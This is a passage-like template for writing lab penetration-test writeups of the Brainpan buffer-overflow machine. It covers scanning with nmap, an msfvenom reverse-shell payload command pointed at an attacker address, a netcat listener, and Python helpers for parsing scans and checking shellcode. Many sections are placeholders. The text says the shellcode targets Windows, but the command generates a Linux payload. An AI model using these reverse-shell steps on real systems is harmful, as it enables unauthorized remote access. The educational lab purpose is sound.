A Framework for Writing Lab (Target Range) Penetration-Test Writeups

Date: 2022-07-22

Introduction

What is the environment of the target? What kind of technology is needed for the attack? What is the purpose of the process?

The process of developing the exploit in this post follows these eight steps:

Example:

Step 1: Fuzzing
Step 2: Replicating the Crash
Step 3: Finding the Offset to the EIP Register
Step 4: Controlling the EIP Register
Step 5: Finding Space for Shellcode
Step 6: Finding Bad Characters
Step 7: Jumping to the ESP Register
Step 8: Writing the Exploit

Tools Used

A Windows host or virtual machine

A Kali Linux host or virtual machine

OllyDbg

Python

Searchsploit

Firefox

Msfvenom

Methodologies

We are required to fill out this penetration testing document fully and to include the following sections:

  • Overall High-Level Summary and Recommendations (non-technical)
  • Methodology walkthrough and detailed outline of steps taken
  • Each finding with included screenshots, walkthrough, sample code.
  • Any additional items that were not included

Information Gathering

Example:

The first thing to know is the local network address by using the ip addr command.

Enumeration: Nmap

Because the VulnHub virtual machines come in a downloadable, self-hosted format, the machine gets an IP address from DHCP when it starts. This means that, unlike online challenges such as Hack The Box, the IP address of the machine is somewhat “unknown” beforehand.

The first thing to know is the local network address by using the ifconfig command.

nmap -sP 192.168.33.0/24

Running an initial scan with Nmap reveals ports 9999 and 10000 are open.

nmap -n -sV -Pn -T4 192.168.33.129 -oA nmap/initial

Command explanation:

nmap - network scanner tool used to discover hosts and services on machines.

-n - No DNS resolution

-sC - performing a script scan using the default scripts.

-sV - performing service version detection.

-oA - output in all formats.

-Pn - treat the host as online and skip host discovery (this was necessary for the nmap scan on this machine).
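The -oA flag above writes the scan in all three formats, and the grepable .gnmap file is the easiest one to turn into the port table that the Enumeration section of a writeup needs. The following parser is an added example, not part of the original post or of any tool it mentions; the .gnmap text embedded in it is constructed to match the ports the post reports (9999 and 10000), and its service and version strings are illustrative placeholders rather than real scan results.

```python
import re

# Constructed sample of nmap grepable output (the .gnmap file written by -oA).
# Ports match the post's scan; service/version strings are illustrative only.
SAMPLE_GNMAP = """\
# Nmap 7.92 scan initiated as: nmap -n -sV -Pn -T4 192.168.33.129 -oA nmap/initial
Host: 192.168.33.129 ()\tStatus: Up
Host: 192.168.33.129 ()\tPorts: 9999/open/tcp//unknown///, 10000/open/tcp//http//example-httpd 1.0 (illustrative)/\tIgnored State: closed (998)
# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds
"""


def parse_gnmap(text):
    """Return {host: [(port, proto, state, service, version), ...]} from gnmap text.

    A gnmap port entry has the form port/state/proto/owner/service/rpc/version/
    and entries are separated by ", ". nmap replaces "/" inside field values
    with "|", so splitting on "/" is safe.
    """
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        host = line.split()[1]
        m = re.search(r"\tPorts: (.*?)(?:\t|$)", line)
        if not m:
            continue  # status-only line, no port data
        for entry in m.group(1).split(", "):
            fields = entry.split("/")
            if len(fields) < 7:
                continue  # malformed entry, skip rather than crash the report
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            results.setdefault(host, []).append(
                (int(port), proto, state, service, version)
            )
    return results


def open_ports(results, host):
    """Sorted list of open port numbers for one host."""
    return sorted(p for p, _proto, state, _s, _v in results.get(host, []) if state == "open")


def markdown_table(results, host):
    """Render one host's ports as a table ready to paste into the writeup."""
    lines = ["| Port | Proto | State | Service | Version |", "|---|---|---|---|---|"]
    for port, proto, state, service, version in sorted(results.get(host, [])):
        lines.append(f"| {port} | {proto} | {state} | {service} | {version} |")
    return "\n".join(lines)


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    print(markdown_table(scan, "192.168.33.129"))
```

Run it against the real nmap/initial.gnmap by replacing SAMPLE_GNMAP with the file contents; the same parser works for any host the scan covered, since it keys results by host address.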

Enumeration: Firefox

Enumeration: dirb

A dirb scan reveals an interesting bin directory.

Visiting the bin directory with the Firefox browser reveals a downloadable executable with the name brainpan.exe.

Debugging: Step 1 Fuzzing

Suspecting that the exe application is vulnerable to a buffer overflow attack, a simple Python fuzzer can be written to test this.

Debugging: Setting Up the Debugging Environment

Now that we know the brainpan.exe application is vulnerable to a buffer overflow attack, it is time to configure the debugging environment to help develop an exploit. Make sure to start OllyDbg as Administrator; a window looking like the one below should appear.

.

.

.

Debugging: Step 8 Writing the Exploit

It is time to finish the exploit by generating and adding some shellcode.

Msfvenom can be leveraged to generate a Windows reverse shell shellcode that connects back to a listener on our attacking machine. Make sure to exclude any bad characters that were found in Step 6 with the -b option. The generated shellcode is 351 bytes long, which neatly fits in the 522 C’s we have added to our buffer variable.

Note the use of EXITFUNC=thread to make an application crash less likely when the process crashes or exits.

Command explanation:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.33.110 LPORT=4444 EXITFUNC=thread -a x86 --platform linux -b "\x00" -f c > sheelcode_linux_test.txt

msfvenom - Rapid7 (creators of the Metasploit framework) tool for payload generation.

LHOST - attacker ip address.

LPORT - attacker listening port.

Options:
    -p, --payload            Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled             Prepend a nopsled of [length] size on to the payload
    -f, --format              Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder            The encoder to use
    -a, --arch                  The architecture to use
        --platform          The platform of the payload
        --help-platforms             List available platforms
    -s, --space               The maximum size of the resulting payload
        --encoder-space       The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars             The list of characters to avoid example: '\x00\xff'
    -i, --iterations           The number of times to encode the payload
    -c, --add-code              Specify an additional win32 shellcode file to include
    -x, --template              Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out                   Save the payload
    -v, --var-name              Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message
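Two things the paragraph above asks you to verify by hand, that the -b list really kept every bad character out of the payload and that the payload fits in the 522 bytes of C’s, are easy to check programmatically from the -f c output before the exploit is ever run. The script below is an added example, not code from the original post or from Metasploit: the C-format text it parses is a constructed stand-in made of filler bytes (it is not a working payload), the bad-character list \x00\x0a\x0d is assumed for illustration, and the 522-byte space is the figure from the post.

```python
import re

# Constructed stand-in for `msfvenom ... -f c` output. The bytes are filler
# (NOPs and ASCII letters), not a real payload, and deliberately include two
# bytes from the assumed bad-character list so the check has something to find.
SAMPLE_C_OUTPUT = r'''unsigned char buf[] = 
"\x90\x90\x90\x90\x41\x42\x43\x44"
"\x00\x45\x46\x47\x0a\x48\x49\x4a";
'''

ASSUMED_BAD_CHARS = b"\x00\x0a\x0d"   # assumption: whatever Step 6 found for the target
AVAILABLE_SPACE = 522                  # the 522 C's from the post's buffer variable


def parse_c_shellcode(text):
    """Turn msfvenom's C-style output (\\xHH escapes across string literals) into bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def check_shellcode(payload, bad_chars, available):
    """Report bad-character hits (offset, byte) and whether the payload fits."""
    hits = [(i, b) for i, b in enumerate(payload) if b in bad_chars]
    return {
        "length": len(payload),
        "fits": len(payload) <= available,
        "bad_char_hits": hits,
        "clean": not hits,
    }


def pad_to_space(payload, available, filler=b"C"):
    """Pad the payload with filler up to the reserved space, refusing to overflow it."""
    if len(payload) > available:
        raise ValueError(f"payload is {len(payload)} bytes, only {available} available")
    return payload + filler * (available - len(payload))


if __name__ == "__main__":
    sc = parse_c_shellcode(SAMPLE_C_OUTPUT)
    report = check_shellcode(sc, ASSUMED_BAD_CHARS, AVAILABLE_SPACE)
    print(f"length={report['length']} fits={report['fits']} clean={report['clean']}")
    for offset, byte in report["bad_char_hits"]:
        print(f"  bad char 0x{byte:02x} at offset {offset}")
```

With the real msfvenom output the check should come back clean; a hit means the -b list given to msfvenom did not match the list found in Step 6, which is the usual reason a payload that "fits" still fails to run.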

nc -nvlp 4444

nc - netcat, a TCP and UDP tool for making connections and listening for them.

-l - listen for connections.

-v - verbose output.

-p - port number.

-n - numeric addresses only, no DNS resolution.

Exploitation: Initial Shell

……

Privilege Escalation

…..

Exploitation: System

…..

Exploitation: Root

……

Conclusion

This challenge helped me understand the process behind xxx and what goes on under the xxx a lot better. Documenting the process ……